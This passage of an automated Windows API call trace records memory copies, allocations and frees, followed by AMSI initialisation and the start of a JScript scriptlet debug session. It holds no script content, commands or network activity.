_Dst=0x24ae19fdd8c, _Src=0x24ae1462bbc, _Size=0xa | out: _Dst=0x24ae19fdd8c) returned 0x24ae19fdd8c [0099.774] memcpy (in: _Dst=0x24ae19fdda0, _Src=0x24ae1462bfc, _Size=0xc | out: _Dst=0x24ae19fdda0) returned 0x24ae19fdda0 [0099.774] memcpy (in: _Dst=0x24ae19fddb4, _Src=0x24ae1462c3c, _Size=0xc | out: _Dst=0x24ae19fddb4) returned 0x24ae19fddb4 [0099.774] memcpy (in: _Dst=0x24ae19fddc8, _Src=0x24ae1462c7c, _Size=0xc | out: _Dst=0x24ae19fddc8) returned 0x24ae19fddc8 [0099.774] memcpy (in: _Dst=0x24ae19fdddc, _Src=0x24ae1462cbc, _Size=0xc | out: _Dst=0x24ae19fdddc) returned 0x24ae19fdddc [0099.774] memcpy (in: _Dst=0x24ae19fddf0, _Src=0x24ae1462cfc, _Size=0xc | out: _Dst=0x24ae19fddf0) returned 0x24ae19fddf0 [0099.774] memcpy (in: _Dst=0x24ae19fde04, _Src=0x24ae1462d3c, _Size=0xc | out: _Dst=0x24ae19fde04) returned 0x24ae19fde04 [0099.775] memcpy (in: _Dst=0x24ae19fde18, _Src=0x24ae1462d7c, _Size=0xc | out: _Dst=0x24ae19fde18) returned 0x24ae19fde18 [0099.775] memcpy (in: _Dst=0x24ae19fde2c, _Src=0x24ae1462dbc, _Size=0xc | out: _Dst=0x24ae19fde2c) returned 0x24ae19fde2c [0099.775] memcpy (in: _Dst=0x24ae19fde40, _Src=0x24ae1462dfc, _Size=0xc | out: _Dst=0x24ae19fde40) returned 0x24ae19fde40 [0099.775] memcpy (in: _Dst=0x24ae19fde54, _Src=0x24ae1462e3c, _Size=0xc | out: _Dst=0x24ae19fde54) returned 0x24ae19fde54 [0099.775] memcpy (in: _Dst=0x24ae19fde68, _Src=0x24ae1462e7c, _Size=0xc | out: _Dst=0x24ae19fde68) returned 0x24ae19fde68 [0099.775] memcpy (in: _Dst=0x24ae19fde7c, _Src=0x24adfc6b494, _Size=0xa | out: _Dst=0x24ae19fde7c) returned 0x24ae19fde7c [0099.775] memcpy (in: _Dst=0x24ae19fde90, _Src=0x24ae1462ebc, _Size=0xc | out: _Dst=0x24ae19fde90) returned 0x24ae19fde90 [0099.775] memcpy (in: _Dst=0x24ae19fdea4, _Src=0x24ae1462f54, _Size=0xc | out: _Dst=0x24ae19fdea4) returned 0x24ae19fdea4 [0099.775] memcpy (in: _Dst=0x24ae19fdeb8, _Src=0x24ae1462f94, _Size=0xc | out: _Dst=0x24ae19fdeb8) returned 0x24ae19fdeb8 [0099.775] memcpy (in: _Dst=0x24ae19fdecc, _Src=0x24ae1462fd4, _Size=0xa | out: _Dst=0x24ae19fdecc) returned 0x24ae19fdecc [0099.775] memcpy (in: _Dst=0x24ae19fdee0, _Src=0x24ae1463014, _Size=0xc | out: _Dst=0x24ae19fdee0) returned 0x24ae19fdee0 [0099.775] memcpy (in: _Dst=0x24ae19fdef4, _Src=0x24ae1463054, _Size=0xc | out: _Dst=0x24ae19fdef4) returned 0x24ae19fdef4 [0099.775] memcpy (in: _Dst=0x24ae19fdf08, _Src=0x24ae14630ec, _Size=0xc | out: _Dst=0x24ae19fdf08) returned 0x24ae19fdf08 [0099.775] memcpy (in: _Dst=0x24ae19fdf1c, _Src=0x24ae146312c, _Size=0xc | out: _Dst=0x24ae19fdf1c) returned 0x24ae19fdf1c [0099.775] memcpy (in: _Dst=0x24ae19fdf30, _Src=0x24ae146316c, _Size=0xc | out: _Dst=0x24ae19fdf30) returned 0x24ae19fdf30 [0099.775] memcpy (in: _Dst=0x24ae19fdf44, _Src=0x24ae14631ac, _Size=0xc | out: _Dst=0x24ae19fdf44) returned 0x24ae19fdf44 [0099.776] memcpy (in: _Dst=0x24ae19fdf58, _Src=0x24ae14631ec, _Size=0xc | out: _Dst=0x24ae19fdf58) returned 0x24ae19fdf58 [0099.776] memcpy (in: _Dst=0x24ae19fdf6c, _Src=0x24ae146322c, _Size=0xa | out: _Dst=0x24ae19fdf6c) returned 0x24ae19fdf6c [0099.776] memcpy (in: _Dst=0x24ae19fdf80, _Src=0x24ae146326c, _Size=0xa | out: _Dst=0x24ae19fdf80) returned 0x24ae19fdf80 [0099.776] memcpy (in: _Dst=0x24ae19fdf94, _Src=0x24ae14632ac, _Size=0xa | out: _Dst=0x24ae19fdf94) returned 0x24ae19fdf94 [0099.776] memcpy (in: _Dst=0x24ae19fdfa8, _Src=0x24ae14632ec, _Size=0xa | out: _Dst=0x24ae19fdfa8) returned 0x24ae19fdfa8 [0099.776] memcpy (in: _Dst=0x24ae19fdfbc, _Src=0x24ae146332c, _Size=0xc | out: _Dst=0x24ae19fdfbc) returned 0x24ae19fdfbc [0099.776] memcpy (in: _Dst=0x24ae19fdfd0, _Src=0x24ae146336c, _Size=0xc | out: _Dst=0x24ae19fdfd0) returned 0x24ae19fdfd0 [0099.776] memcpy (in: _Dst=0x24ae19fdfe4, _Src=0x24ae14633ac, _Size=0xa | out: _Dst=0x24ae19fdfe4) returned 0x24ae19fdfe4 [0099.776] memcpy (in: _Dst=0x24ae19fdff8, _Src=0x24ae14633ec, _Size=0xc | out: _Dst=0x24ae19fdff8) returned 0x24ae19fdff8 [0099.776] memcpy (in: _Dst=0x24ae19fe00c, _Src=0x24adfc6b354, _Size=0xa | out: _Dst=0x24ae19fe00c) returned 0x24ae19fe00c [0099.776] memcpy (in: _Dst=0x24ae19fe020, _Src=0x24ae146342c, _Size=0xc | out: _Dst=0x24ae19fe020) returned 0x24ae19fe020 [0099.776] memcpy (in: _Dst=0x24ae19fe034, _Src=0x24adfc6b394, _Size=0xa | out: _Dst=0x24ae19fe034) returned 0x24ae19fe034 [0099.776] memcpy (in: _Dst=0x24ae19fe048, _Src=0x24ae146346c, _Size=0xa | out: _Dst=0x24ae19fe048) returned 0x24ae19fe048 [0099.776] memcpy (in: _Dst=0x24ae19fe05c, _Src=0x24ae14634ac, _Size=0xc | out: _Dst=0x24ae19fe05c) returned 0x24ae19fe05c [0099.776] memcpy (in: _Dst=0x24ae19fe070, _Src=0x24ae14634ec, _Size=0xc | out: _Dst=0x24ae19fe070) returned 0x24ae19fe070 [0099.776] memcpy (in: _Dst=0x24ae19fe084, _Src=0x24ae146352c, _Size=0xa | out: _Dst=0x24ae19fe084) returned 0x24ae19fe084 [0099.776] memcpy (in: _Dst=0x24ae19fe098, _Src=0x24ae146356c, _Size=0xa | out: _Dst=0x24ae19fe098) returned 0x24ae19fe098 [0099.776] memcpy (in: _Dst=0x24ae19fe0ac, _Src=0x24ae14635ac, _Size=0xc | out: _Dst=0x24ae19fe0ac) returned 0x24ae19fe0ac [0099.777] memcpy (in: _Dst=0x24ae19fe0c0, _Src=0x24ae14635ec, _Size=0xc | out: _Dst=0x24ae19fe0c0) returned 0x24ae19fe0c0 [0099.777] memcpy (in: _Dst=0x24ae19fe0d4, _Src=0x24ae146362c, _Size=0xc | out: _Dst=0x24ae19fe0d4) returned 0x24ae19fe0d4 [0099.777] memcpy (in: _Dst=0x24ae19fe0e8, _Src=0x24ae146366c, _Size=0xc | out: _Dst=0x24ae19fe0e8) returned 0x24ae19fe0e8 [0099.777] memcpy (in: _Dst=0x24ae19fe0fc, _Src=0x24ae14636ac, _Size=0xc | out: _Dst=0x24ae19fe0fc) returned 0x24ae19fe0fc [0099.777] memcpy (in: _Dst=0x24ae19fe110, _Src=0x24adfc6b414, _Size=0xc | out: _Dst=0x24ae19fe110) returned 0x24ae19fe110 [0099.777] memcpy (in: _Dst=0x24ae19fe124, _Src=0x24ae14636ec, _Size=0xc | out: _Dst=0x24ae19fe124) returned 0x24ae19fe124 [0099.777] memcpy (in: _Dst=0x24ae19fe138, _Src=0x24ae146372c, _Size=0xc | out: _Dst=0x24ae19fe138) returned 0x24ae19fe138 [0099.777] memcpy (in: _Dst=0x24ae19fe14c, _Src=0x24ae146376c, _Size=0xc | out: _Dst=0x24ae19fe14c) returned 0x24ae19fe14c [0099.777] memcpy (in: _Dst=0x24ae19fe160, _Src=0x24ae14637ac, _Size=0xc | out: _Dst=0x24ae19fe160) returned 0x24ae19fe160 [0099.777] memcpy (in: _Dst=0x24ae19fe174, _Src=0x24ae14637ec, _Size=0xc | out: _Dst=0x24ae19fe174) returned 0x24ae19fe174 [0099.777] memcpy (in: _Dst=0x24ae19fe188, _Src=0x24ae146382c, _Size=0xc | out: _Dst=0x24ae19fe188) returned 0x24ae19fe188 [0099.777] memcpy (in: _Dst=0x24ae19fe19c, _Src=0x24ae146386c, _Size=0xa | out: _Dst=0x24ae19fe19c) returned 0x24ae19fe19c [0099.777] memcpy (in: _Dst=0x24ae19fe1b0, _Src=0x24ae14638ac, _Size=0xc | out: _Dst=0x24ae19fe1b0) returned 0x24ae19fe1b0 [0099.777] memcpy (in: _Dst=0x24ae19fe1c4, _Src=0x24ae14638ec, _Size=0xc | out: _Dst=0x24ae19fe1c4) returned 0x24ae19fe1c4 [0099.777] memcpy (in: _Dst=0x24ae19fe1d8, _Src=0x24ae146392c, _Size=0xc | out: _Dst=0x24ae19fe1d8) returned 0x24ae19fe1d8 [0099.777] memcpy (in: _Dst=0x24ae19fe1ec, _Src=0x24ae146396c, _Size=0xc | out: _Dst=0x24ae19fe1ec) returned 0x24ae19fe1ec [0099.777] memcpy (in: _Dst=0x24ae19fe200, _Src=0x24ae14639ac, _Size=0xc | out: _Dst=0x24ae19fe200) returned 0x24ae19fe200 [0099.778] memcpy (in: _Dst=0x24ae19fe214, _Src=0x24ae14639ec, _Size=0xa | out: _Dst=0x24ae19fe214) returned 0x24ae19fe214 [0099.778] memcpy (in: _Dst=0x24ae19fe228, _Src=0x24ae1463a2c, _Size=0xa | out: _Dst=0x24ae19fe228) returned 0x24ae19fe228 [0099.778] memcpy (in: _Dst=0x24ae19fe23c, _Src=0x24ae1463a6c, _Size=0xc | out: _Dst=0x24ae19fe23c) returned 0x24ae19fe23c [0099.778] memcpy (in: _Dst=0x24ae19fe250, _Src=0x24ae1463aac, _Size=0xc | out: _Dst=0x24ae19fe250) returned 0x24ae19fe250 [0099.778] memcpy (in: _Dst=0x24ae19fe264, _Src=0x24ae1463aec, _Size=0xc | out: _Dst=0x24ae19fe264) returned 0x24ae19fe264 [0099.778] memcpy (in: _Dst=0x24ae19fe278, _Src=0x24ae1463b2c, _Size=0xc | out: _Dst=0x24ae19fe278) returned 0x24ae19fe278 [0099.778] memcpy (in: _Dst=0x24ae19fe28c, _Src=0x24ae1463b6c, _Size=0xc | out: _Dst=0x24ae19fe28c) returned 0x24ae19fe28c [0099.778] memcpy (in: _Dst=0x24ae19fe2a0, _Src=0x24ae1463bac, _Size=0xc | out: _Dst=0x24ae19fe2a0) returned 0x24ae19fe2a0 [0099.778] memcpy (in: _Dst=0x24ae19fe2b4, _Src=0x24ae1463bec, _Size=0xc | out: _Dst=0x24ae19fe2b4) returned 0x24ae19fe2b4 [0099.778] memcpy (in: _Dst=0x24ae19fe2c8, _Src=0x24ae1463c2c, _Size=0xc | out: _Dst=0x24ae19fe2c8) returned 0x24ae19fe2c8 [0099.778] memcpy (in: _Dst=0x24ae19fe2dc, _Src=0x24adfc6b294, _Size=0xc | out: _Dst=0x24ae19fe2dc) returned 0x24ae19fe2dc [0099.778] memcpy (in: _Dst=0x24ae19fe2f0, _Src=0x24ae1463c6c, _Size=0xc | out: _Dst=0x24ae19fe2f0) returned 0x24ae19fe2f0 [0099.778] memcpy (in: _Dst=0x24ae19fe304, _Src=0x24ae1463cac, _Size=0xc | out: _Dst=0x24ae19fe304) returned 0x24ae19fe304 [0099.778] memcpy (in: _Dst=0x24ae19fe318, _Src=0x24ae1463cec, _Size=0xa | out: _Dst=0x24ae19fe318) returned 0x24ae19fe318 [0099.778] memcpy (in: _Dst=0x24ae19fe32c, _Src=0x24ae1463d2c, _Size=0xa | out: _Dst=0x24ae19fe32c) returned 0x24ae19fe32c [0099.779] memcpy (in: _Dst=0x24ae19fe340, _Src=0x24ae1463d6c, _Size=0xa | out: _Dst=0x24ae19fe340) returned 0x24ae19fe340 [0099.779] memcpy (in: _Dst=0x24ae19fe354, _Src=0x24ae1463dac, _Size=0xc | out: _Dst=0x24ae19fe354) returned 0x24ae19fe354 [0099.779] memcpy (in: _Dst=0x24ae19fe368, _Src=0x24ae1463dec, _Size=0xa | out: _Dst=0x24ae19fe368) returned 0x24ae19fe368 [0099.779] memcpy (in: _Dst=0x24ae19fe37c, _Src=0x24ae1463e2c, _Size=0xc | out: _Dst=0x24ae19fe37c) returned 0x24ae19fe37c [0099.779] memcpy (in: _Dst=0x24ae19fe390, _Src=0x24ae1463e6c, _Size=0xc | out: _Dst=0x24ae19fe390) returned 0x24ae19fe390 [0099.779] memcpy (in: _Dst=0x24ae19fe3a4, _Src=0x24ae1463eac, _Size=0xa | out: _Dst=0x24ae19fe3a4) returned 0x24ae19fe3a4 [0099.779] memcpy (in: _Dst=0x24ae19fe3b8, _Src=0x24ae1463eec, _Size=0xc | out: _Dst=0x24ae19fe3b8) returned 0x24ae19fe3b8 [0099.779] memcpy (in: _Dst=0x24ae19fe3cc, _Src=0x24ae1463f2c, _Size=0xc | out: _Dst=0x24ae19fe3cc) returned 0x24ae19fe3cc [0099.779] memcpy (in: _Dst=0x24ae19fe3e0, _Src=0x24ae1463f6c, _Size=0xc | out: _Dst=0x24ae19fe3e0) returned 0x24ae19fe3e0 [0099.779] memcpy (in: _Dst=0x24ae19fe3f4, _Src=0x24ae1463fac, _Size=0xc | out: _Dst=0x24ae19fe3f4) returned 0x24ae19fe3f4 [0099.779] memcpy (in: _Dst=0x24ae19fe408, _Src=0x24ae1463fec, _Size=0xc | out: _Dst=0x24ae19fe408) returned 0x24ae19fe408 [0099.779] memcpy (in: _Dst=0x24ae19fe41c, _Src=0x24ae146402c, _Size=0xc | out: _Dst=0x24ae19fe41c) returned 0x24ae19fe41c [0099.779] memcpy (in: _Dst=0x24ae19fe430, _Src=0x24ae146406c, _Size=0xa | out: _Dst=0x24ae19fe430) returned 0x24ae19fe430 [0099.779] memcpy (in: _Dst=0x24ae19fe444, _Src=0x24ae14640ac, _Size=0xc | out: _Dst=0x24ae19fe444) returned 0x24ae19fe444 [0099.779] memcpy (in: _Dst=0x24ae19fe458, _Src=0x24ae14640ec, _Size=0xc | out: _Dst=0x24ae19fe458) returned 0x24ae19fe458 [0099.779] memcpy (in: _Dst=0x24ae19fe46c, _Src=0x24ae146412c, _Size=0xc | out: _Dst=0x24ae19fe46c) returned 0x24ae19fe46c [0099.780] memcpy (in: _Dst=0x24ae19fe480, _Src=0x24ae146416c, _Size=0xc | out: _Dst=0x24ae19fe480) returned 0x24ae19fe480 [0099.780] memcpy (in: _Dst=0x24ae19fe494, _Src=0x24ae14641ac, _Size=0xc | out: _Dst=0x24ae19fe494) returned 0x24ae19fe494 [0099.780] memcpy (in: _Dst=0x24ae19fe4a8, _Src=0x24ae14641ec, _Size=0xc | out: _Dst=0x24ae19fe4a8) returned 0x24ae19fe4a8 [0099.780] memcpy (in: _Dst=0x24ae19fe4bc, _Src=0x24ae146422c, _Size=0xa | out: _Dst=0x24ae19fe4bc) returned 0x24ae19fe4bc [0099.780] memcpy (in: _Dst=0x24ae19fe4d0, _Src=0x24ae146426c, _Size=0xc | out: _Dst=0x24ae19fe4d0) returned 0x24ae19fe4d0 [0099.780] memcpy (in: _Dst=0x24ae19fe4e4, _Src=0x24adfc6b214, _Size=0xc | out: _Dst=0x24ae19fe4e4) returned 0x24ae19fe4e4 [0099.780] memcpy (in: _Dst=0x24ae19fe4f8, _Src=0x24ae14642ac, _Size=0xc | out: _Dst=0x24ae19fe4f8) returned 0x24ae19fe4f8 [0099.780] memcpy (in: _Dst=0x24ae19fe50c, _Src=0x24ae14642ec, _Size=0xc | out: _Dst=0x24ae19fe50c) returned 0x24ae19fe50c [0099.780] memcpy (in: _Dst=0x24ae19fe520, _Src=0x24ae146432c, _Size=0xc | out: _Dst=0x24ae19fe520) returned 0x24ae19fe520 [0099.780] memcpy (in: _Dst=0x24ae19fe534, _Src=0x24ae146436c, _Size=0xc | out: _Dst=0x24ae19fe534) returned 0x24ae19fe534 [0099.780] memcpy (in: _Dst=0x24ae19fe548, _Src=0x24ae14643ac, _Size=0xa | out: _Dst=0x24ae19fe548) returned 0x24ae19fe548 [0099.790] malloc (_Size=0x10) returned 0x24ae1459f40 [0099.791] free (_Block=0x24ae19dc2d0) [0099.792] free (_Block=0x24ae19d42b0) [0099.793] free (_Block=0x24ae19c4270) [0099.794] free (_Block=0x24ae19bc250) [0099.795] free (_Block=0x24ae19b4230) [0099.796] free (_Block=0x24ae19ac210) [0099.797] free (_Block=0x24ae19941b0) [0099.798] free (_Block=0x24ae1980160) [0099.798] free (_Block=0x24ae196c110) [0099.799] free (_Block=0x24ae19580c0) [0099.799] free (_Block=0x24ae1948080) [0099.800] free (_Block=0x24ae1938040) [0099.801] free (_Block=0x24ae1923ff0) [0099.806] free (_Block=0x24ae1482070) [0099.807] free (_Block=0x24ae146e020) [0099.807] free (_Block=0x24ae1461ff0) [0099.808] free (_Block=0x24adfc67fd0) [0099.808] free (_Block=0x24ae13cc0a0) [0099.809] free (_Block=0x24ae13c9790) [0099.809] free (_Block=0x24ae13c9150) [0099.809] free (_Block=0x24ae13ca950) [0099.810] free (_Block=0x24adfc6bfe0) [0099.810] free (_Block=0x24ae19f8340) [0099.811] free (_Block=0x24ae19f4330) [0099.812] free (_Block=0x24ae19f0320) [0099.812] free (_Block=0x24ae19ec310) [0099.813] free (_Block=0x24ae19e8300) [0099.813] free (_Block=0x24ae19e42f0) [0099.847] free (_Block=0x24ae19e02e0) [0099.849] free (_Block=0x24ae19d82c0) [0099.851] free (_Block=0x24ae19d02a0) [0099.852] free (_Block=0x24ae19cc290) [0099.852] free (_Block=0x24ae19c8280) [0099.853] free (_Block=0x24ae19c0260) [0099.854] free (_Block=0x24ae19b8240) [0099.855] free (_Block=0x24ae19b0220) [0099.855] free (_Block=0x24ae19a8200) [0099.856] free (_Block=0x24ae19a41f0) [0099.857] free (_Block=0x24ae19a01e0) [0099.859] free (_Block=0x24ae199c1d0) [0099.861] free (_Block=0x24ae19981c0) [0099.861] free (_Block=0x24ae19901a0) [0099.862] free (_Block=0x24ae198c190) [0099.863] free (_Block=0x24ae1988180) [0099.864] free (_Block=0x24ae1984170) [0099.865] free (_Block=0x24ae197c150) [0099.865] free (_Block=0x24ae1978140) [0099.866] free (_Block=0x24ae1974130) [0099.867] free (_Block=0x24ae1970120) [0099.871] free (_Block=0x24ae1968100) [0099.874] free (_Block=0x24ae19640f0) [0099.875] free (_Block=0x24ae19600e0) [0099.875] free (_Block=0x24ae195c0d0) [0099.876] free (_Block=0x24ae19540b0) [0099.877] free (_Block=0x24ae19500a0) [0099.878] free (_Block=0x24ae194c090) [0099.879] free (_Block=0x24ae1944070) [0099.880] free (_Block=0x24ae1940060) [0099.880] free (_Block=0x24ae193c050) [0099.884] free (_Block=0x24ae1934030) [0099.886] free (_Block=0x24ae1930020) [0099.887] free (_Block=0x24ae192c010) [0099.887] free (_Block=0x24ae1928000) [0099.888] free (_Block=0x24ae191ffe0) [0099.888] free (_Block=0x24ae191bfd0) [0099.889] free (_Block=0x24ae148a090) [0099.890] free (_Block=0x24ae1486080) [0099.890] free (_Block=0x24ae147e060) [0099.896] free (_Block=0x24ae147a050) [0099.897] free (_Block=0x24ae1476040) [0099.897] free (_Block=0x24ae1472030) [0099.898] free (_Block=0x24ae146a010) [0099.899] free (_Block=0x24ae1466000) [0099.899] free (_Block=0x24ae145dfe0) [0099.900] free (_Block=0x24ae1459fd0) [0099.900] free (_Block=0x24ae13cf0c0) [0099.901] free (_Block=0x24ae13ce0b0) [0099.901] free (_Block=0x24ae13cb890) [0099.901] free (_Block=0x24ae13cb480) [0099.902] free (_Block=0x24ae13cb270) [0099.903] free (_Block=0x24ae14597a0) [0099.903] malloc (_Size=0x58) returned 0x24ae1a7ab80 [0099.903] malloc (_Size=0x20) returned 0x24ae1a7abe0 [0099.903] malloc (_Size=0x10) returned 0x24ae1459f60 [0099.904] free (_Block=0x24ae13c8eb0) [0099.904] GetUserDefaultLCID () returned 0x409 [0099.904] GetACP () returned 0x4e4 [0099.905] free (_Block=0x24ae13c8e10) [0099.906] ISystemDebugEventFire:EndSession (This=0x24adf9a8d00) returned 0x0 [0099.906] IUnknown:Release (This=0x24adf9a8d00) returned 0x1 [0099.907] free (_Block=0x24ae13c8920) [0099.907] IUnknown:Release (This=0x24adf9a8d00) returned 0x0 [0099.908] free (_Block=0x24adfc67f50) [0099.910] free (_Block=0x24ae1459d70) [0099.910] free (_Block=0x24adfc67b40) [0099.910] free (_Block=0x24adfc67b20) [0099.910] free (_Block=0x24adfc67b00) [0099.911] free (_Block=0x24adfc67ad0) [0099.911] free (_Block=0x24adfc67ab0) [0099.911] free (_Block=0x24adfc67a90) [0099.911] free (_Block=0x24adfc67730) [0099.912] free (_Block=0x24ae13abea0) [0099.919] free (_Block=0x24ae1880080) [0099.922] free (_Block=0x24adfc67620) [0099.923] free (_Block=0x24ae1390080) [0099.926] free (_Block=0x24adfc67550) [0099.930] free (_Block=0x24ae13d2f40) [0099.931] free (_Block=0x24adfc675f0) [0099.931] malloc (_Size=0x60) returned 0x24adfc67a90 [0099.931] malloc (_Size=0x18) returned 0x24adfc67550 [0099.931] malloc (_Size=0x60) returned 0x24adfc67b00 [0099.931] malloc (_Size=0x40) returned 0x24adfc67f50 [0099.931] malloc (_Size=0x40) returned 0x24ae1459d70 [0099.931] malloc (_Size=0x68) returned 0x24adfc675f0 [0099.932] memcpy (in: _Dst=0x24adfc67638, _Src=0x7ff8598fc848, _Size=0x20 | out: _Dst=0x24adfc67638) returned 0x24adfc67638 [0099.932] malloc (_Size=0x68) returned 0x24adfc67660 [0099.932] memcpy (in: _Dst=0x24adfc676a8, _Src=0x7ff8598fc828, _Size=0x20 | out: _Dst=0x24adfc676a8) returned 0x24adfc676a8 [0099.932] malloc (_Size=0x60) returned 0x24adfc676d0 [0099.932] memcpy (in: _Dst=0x24adfc67718, _Src=0x7ff8598fc810, _Size=0x18 | out: _Dst=0x24adfc67718) returned 0x24adfc67718 [0099.932] malloc (_Size=0x8) returned 0x24adfc67740 [0099.932] malloc (_Size=0x3d8) returned 0x24ae13c8920 [0099.932] GetUserDefaultLCID () returned 0x409 [0099.932] GetACP () returned 0x4e4 [0099.932] LoadLibraryExW (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x800) returned 0x7ff86ba30000 [0099.933] GetProcAddress (hModule=0x7ff86ba30000, lpProcName="AmsiInitialize") returned 0x7ff86ba32260 [0099.933] GetProcAddress (hModule=0x7ff86ba30000, lpProcName="AmsiScanString") returned 0x7ff86ba326b0 [0099.933] AmsiInitialize () returned 0x0 [0099.934] malloc (_Size=0x20) returned 0x24ae13c8d00 [0099.934] memcpy (in: _Dst=0xd6788fec90, _Src=0x24ae1459f60, _Size=0x10 | out: _Dst=0xd6788fec90) returned 0xd6788fec90 [0099.934] malloc (_Size=0x58) returned 0x24ae13c8e20 [0099.934] malloc (_Size=0x10) returned 0x24ae13c8d30 [0099.934] memcpy (in: _Dst=0x24ae13c8d30, _Src=0xd6788fec90, _Size=0x10 | out: _Dst=0x24ae13c8d30) returned 0x24ae13c8d30 [0099.934] malloc (_Size=0x18) returned 0x24ae13c8e80 [0099.934] malloc (_Size=0x58) returned 0x24ae13c8ea0 [0099.935] malloc (_Size=0x40) returned 0x24ae13c8f00 [0099.935] GetCurrentThreadId () returned 0xcf4 [0099.935] malloc (_Size=0x4e8) returned 0x24ae1a7ac10 [0099.937] malloc (_Size=0x98) returned 0x24ae1a7b100 [0099.937] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0xd6788febb0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0099.937] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0099.937] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xd6788fec50, cchData=6 | out: lpLCData="1252") returned 5 [0099.937] IsValidCodePage (CodePage=0x4e4) returned 1 [0099.938] CoCreateInstance (in: rclsid=0x7ff859890940*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff859890900*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x24ae13c8c98 | out: ppv=0x24ae13c8c98*=0x24adf9a8d00) returned 0x0 [0099.938] IUnknown:AddRef (This=0x24adf9a8d00) returned 0x2 [0099.938] GetCurrentProcessId () returned 0xcf0 [0099.939] GetCurrentThreadId () returned 0xcf4 [0099.939] GetTickCount () returned 0x210cfab [0099.939] ISystemDebugEventFire:BeginSession (This=0x24adf9a8d00, guidSourceID=0x7ff859890930, strSessionName="JScript:00003312:00003316:34656171") returned 0x0 [0099.939] GetCurrentThreadId () returned 0xcf4 [0099.939] malloc (_Size=0x48) returned 0x24ae1a7b1a0 [0099.939] wcscmp (_String1="scriptlet", _String2="scriptlet") returned 0 [0099.940] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788feb88 | out: ppv=0xd6788feb88*=0x24adf97e528) returned 0x0 [0099.998] malloc (_Size=0x40) returned 0x24ae1a7ba90 [0099.998] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7ff86f4e9610, pUnk=0x24ae1a7ba90, riid=0x7ff859893328*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x24ae1a7bac8 | out: pdwCookie=0x24ae1a7bac8*=0x100) returned 0x0 [0099.998] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x24ae1a7ba90) returned 0x2 [0099.999] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x24ae1a7ba90, riid=0x7ff86f4723d0*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0xd6788fea60 | out: ppvObject=0xd6788fea60*=0x0) returned 0x80004002 [0099.999] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x24ae1a7ba90) returned 0x3 [0099.999] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x24ae1a7ba90, riid=0x7ff86f4723c0*(Data1=0x39, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd6788fe978 | out: ppvObject=0xd6788fe978*=0x0) returned 0x80004002 [0099.999] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x24ae1a7ba90, riid=0x7ff86f472400*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd6788fe960 | out: ppvObject=0xd6788fe960*=0x0) returned 0x80004002 [0099.999] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x24ae1a7ba90, riid=0x7ff86f46f618*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0xd6788fe980 | out: ppvObject=0xd6788fe980*=0x0) returned 0x80004002 [0099.999] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x24ae1a7ba90, riid=0x7ff86f46fb48*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd6788fe970 | out: ppvObject=0xd6788fe970*=0x0) returned 0x80004002 [0099.999] StdGlobalInterfaceTable:IUnknown:Release (This=0x24ae1a7ba90) returned 0x2 [0099.999] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x24ae1a7ba90) returned 0x3 [0099.999] StdGlobalInterfaceTable:IUnknown:Release (This=0x24ae1a7ba90) returned 0x2 [0099.999] IUnknown:AddRef (This=0x24adf97e528) returned 0x2 [0099.999] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0099.999] malloc (_Size=0x970) returned 0x24ae1a7bae0 [0100.000] GetTickCount () returned 0x210cfea [0100.000] malloc (_Size=0xa8) returned 0x24ae1a7c460 [0100.000] malloc (_Size=0x80) returned 0x24ae1a7c510 [0100.000] malloc (_Size=0x108) returned 0x24ae14597a0 [0100.000] memcpy (in: _Dst=0x24ae14597e8, _Src=0x24adf984fb8, _Size=0x14 | out: _Dst=0x24ae14597e8) returned 0x24ae14597e8 [0100.000] malloc (_Size=0x20) returned 0x24ae13c8f50 [0100.000] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 